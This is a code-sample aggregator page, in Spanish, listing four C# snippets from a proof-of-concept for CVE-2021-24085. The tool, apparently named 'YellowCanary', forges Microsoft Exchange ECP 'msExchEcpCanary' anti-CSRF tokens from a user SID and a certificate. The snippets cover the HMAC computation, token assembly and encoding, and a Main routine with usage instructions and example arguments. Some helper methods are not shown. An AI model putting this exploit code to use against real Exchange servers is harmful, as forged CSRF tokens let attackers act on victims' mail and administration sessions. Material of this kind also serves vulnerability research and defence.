Ejemplos de Poc Canary15 en C# (CSharp)

Ejemplo n.º 1

Archivo: Program.cs Proyecto: zenmisael/CVE-2021-24085

 private byte[] ComputeHash(byte[] userContextIdBinary, byte[] timeStampBinary, string logonUniqueKey, out string logData)
 {
     Canary15.CanaryKind canaryKind = Canary15.GetCanaryKind(timeStampBinary);
     byte[] result;
     byte[] bytes = new UnicodeEncoding().GetBytes(logonUniqueKey);
     result = this.ComputeHmac(new byte[][] {
         userContextIdBinary,
         timeStampBinary,
         bytes
     });
     logData = Canary15.FormatLogData(canaryKind);
     return(result);
 }

Ejemplo n.º 2

Archivo: Program.cs Proyecto: zenmisael/CVE-2021-24085

        public Canary15(string logonUniqueKey, string certpath, string certpass, Canary15.CanaryKind canaryKind)
        {
            this.certpath = certpath;
            this.certpass = certpass;
            byte[] userContextIdBinary = Guid.NewGuid().ToByteArray();
            byte[] timeStampBinary     = Canary15.BinaryFromTicksKindScope(DateTime.UtcNow.Ticks, canaryKind);
            string logData;

            byte[] hashBinary = this.ComputeHash(userContextIdBinary, timeStampBinary, logonUniqueKey, out logData);
            this.Init(userContextIdBinary, timeStampBinary, logonUniqueKey, hashBinary, logData);
            this.IsRenewed       = true;
            this.IsAboutToExpire = false;
        }

Ejemplo n.º 3

Archivo: Program.cs Proyecto: zenmisael/CVE-2021-24085

        private void Init(byte[] userContextIdBinary, byte[] timeStampBinary, string logonUniqueKey, byte[] hashBinary, string logData)
        {
            long canaryTicks = Canary15.GetCanaryTicks(timeStampBinary);

            this.kind            = Canary15.GetCanaryKind(timeStampBinary);
            this.CreationTime    = new DateTime(canaryTicks, DateTimeKind.Utc);
            this.IsRenewed       = false;
            this.IsAboutToExpire = Canary15.IsNearExpiration(canaryTicks);
            byte[] array = new byte[userContextIdBinary.Length + timeStampBinary.Length + hashBinary.Length];
            userContextIdBinary.CopyTo(array, 0);
            timeStampBinary.CopyTo(array, userContextIdBinary.Length);
            hashBinary.CopyTo(array, userContextIdBinary.Length + timeStampBinary.Length);
            this.UserContextId  = new Guid(userContextIdBinary).ToString("N");
            this.LogonUniqueKey = logonUniqueKey;
            this.canaryString   = Canary15.Encode(array);
            this.LogData        = logData;
        }

Ejemplo n.º 4

Archivo: Program.cs Proyecto: zenmisael/CVE-2021-24085

        static void Main(string[] args)
        {
            String header = @"
            #====================================================
            # YellowCanary - generate msExchEcpCanary csrf tokens
            #====================================================
            ";

            Console.WriteLine(header);
            if (args.Length < 3)
            {
                Console.WriteLine("Usage: {0} <sid> <cert> <certpass>", AppDomain.CurrentDomain.FriendlyName);
                Console.WriteLine("Eg: {0} S-1-5-21-257332918-392067043-4020791575-3104 testcert.der hax", AppDomain.CurrentDomain.FriendlyName);
                return;
            }
            Canary15 csrf = new Canary15(args[0], args[1], args[2]);

            Console.WriteLine("security identifier : {0}", args[0]);
            Console.WriteLine("msExchEcpCanary     : {0}", csrf.canaryString);
        }